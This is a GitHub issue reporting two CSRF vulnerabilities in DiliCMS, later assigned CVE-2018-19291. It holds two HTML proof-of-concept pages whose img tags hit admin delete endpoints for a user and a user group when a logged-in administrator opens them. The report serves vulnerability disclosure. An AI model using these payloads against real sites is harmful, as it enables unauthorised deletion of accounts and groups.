search

chekun / DiliCMS

DiligentCMS
http://www.dilicms.com/
MIT License
190 stars 101 forks source link

There is two CSRF vulnerability that can delete user or usergroup #60

Open Rich4ever opened 6 years ago

Rich4ever commented 6 years ago

Software Link : https://github.com/chekun/DiliCMS After the administrator logged in,open the page test.html delete user POC:

<html>  
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
</body>
</html>

test2.html delete group POC:

  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
</body>
</html>
fgeek commented 5 years ago

Please use https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19291 for this vulnerability.